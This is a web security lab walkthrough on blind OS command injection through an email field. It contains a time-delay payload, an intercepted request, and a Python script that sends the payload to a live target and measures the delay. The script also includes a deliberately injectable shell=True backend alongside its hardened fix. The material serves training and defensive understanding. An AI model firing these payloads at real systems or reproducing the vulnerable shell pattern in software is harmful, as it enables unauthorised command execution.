Blind OS command injection with time delays


This lab contains a blind OS command injection vulnerability in the feedback function. The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response, so execution can only be confirmed through a side effect such as a measurable time delay.

Reproduction and proof of concept

  1. Use Burp Suite to intercept and modify the request that submits feedback.

  2. Modify the email parameter, changing it to: email=x||ping+-c+10+127.0.0.1||

     The + characters are URL-encoded spaces. ping needs a destination: with none it prints its usage and exits immediately, so no delay occurs; 127.0.0.1 keeps the ten echo requests on loopback, where no outbound network access is needed. The leading || runs ping only if the preceding command fails, which the junk value x is there to provoke, and the trailing || attaches whatever follows the injection point in the original command so the shell string still parses.

POST /feedback/submit HTTP/1.1
Cookie: session=PBI3JYi8xuN2EDvHhrWZseFHddKXZkn3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

  3. Observe that the response takes roughly 10 seconds to return.


To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay; the delay in the response is the only evidence that the injected command ran.
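The procedure above, as an added worked example that is not the lab's own code: it URL-encodes the time-delay payload for the email field, places a stand-in for the vulnerable backend (an assumed grep lookup against a constructed allowlist file, since the page never shows the real backend command) beside its hardened form, and measures the timing difference that is the only observable in a blind case. The http_sender transport, the lookup command, the allowlist contents, and the benign address alice@example.com are all assumptions. The local run substitutes sleep for ping so it needs neither ICMP privileges nor a ping binary; the timing signal is the same.

```python
"""Blind OS command injection with time delays: payload encoding, a stand-in
for the vulnerable backend beside its hardened form, and the timing check.

Added example; none of this is the lab's own code. The backend command is an
assumption (the page never shows the real one), and the allowlist file is a
constructed input.
"""
import subprocess
import tempfile
import time
from urllib.parse import urlencode
from urllib.request import Request, urlopen


def delay_payload(seconds=10, command="ping -c {n} 127.0.0.1"):
    """Lab-style payload. The leading 'x||' makes the injected command run only
    if the preceding command fails (the junk value 'x' is there to provoke that
    failure); the trailing '||' attaches whatever follows the injection point in
    the original command so the shell string still parses. 127.0.0.1 is assumed
    as the ping target: ping with no destination exits at once, and loopback
    needs no outbound network."""
    return "x||" + command.format(n=seconds) + "||"


def form_body(email):
    """application/x-www-form-urlencoded body for the email field alone; the
    live form may post other fields as well, which go into the same dict."""
    return urlencode({"email": email})


# Constructed allowlist standing in for whatever the lab's backend consults.
_allowlist = tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False)
_allowlist.write("alice@example.com\n")
_allowlist.close()


def vulnerable_backend(email):
    """Assumed vulnerable pattern: the field is concatenated into one shell
    string and output is discarded, so only timing reaches the client. With
    email=x||... the first command becomes 'grep -qF x' reading an empty stdin,
    exits 1, and the '||'-chained injected command runs."""
    cmd = f"grep -qF {email} {_allowlist.name} >/dev/null 2>&1"
    subprocess.run(cmd, shell=True, stdin=subprocess.DEVNULL)


def hardened_backend(email):
    """No shell: an argv list passes the value as one literal argument, and
    '--' stops grep from reading a value such as '-c' as an option."""
    subprocess.run(["grep", "-qF", "--", email, _allowlist.name],
                   stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
                   stderr=subprocess.DEVNULL)


def timed_call(send, email):
    """Wall-clock seconds for one submission: the only observable in a blind case."""
    start = time.monotonic()
    send(email)
    return time.monotonic() - start


def confirms_delay(send, seconds, command="ping -c {n} 127.0.0.1",
                   benign="alice@example.com"):
    """True when the delay payload takes at least ~`seconds` longer than a benign
    value. Measuring a baseline first stops a slow server from being mistaken
    for a successful injection."""
    baseline = timed_call(send, benign)
    delayed = timed_call(send, delay_payload(seconds, command))
    return delayed - baseline >= 0.9 * seconds


def http_sender(url, session_cookie):
    """Transport for the real lab (not exercised offline): POSTs the encoded
    body with the session cookie, mirroring the intercepted request."""
    def send(email):
        req = Request(url, data=form_body(email).encode(), method="POST",
                      headers={"Cookie": f"session={session_cookie}",
                               "Content-Type": "application/x-www-form-urlencoded"})
        with urlopen(req, timeout=60) as resp:
            resp.read()
    return send


if __name__ == "__main__":
    # Local demonstration uses 'sleep' in place of ping: same timing signal,
    # but it needs neither ICMP privileges nor a ping binary.
    print(form_body(delay_payload()))
    print("vulnerable:", confirms_delay(vulnerable_backend, 2, command="sleep {n}"))
    print("hardened:  ", confirms_delay(hardened_backend, 2, command="sleep {n}"))
```

Against the live lab, pair confirms_delay with http_sender(url, session_cookie) and the default ping command; the baseline measurement matters there, because a lab instance that is slow for unrelated reasons would otherwise look injectable. The hardened form shows the fix that removes the class of bug rather than filtering metacharacters: no shell is involved, so || and the rest of the payload can only ever be a literal argument.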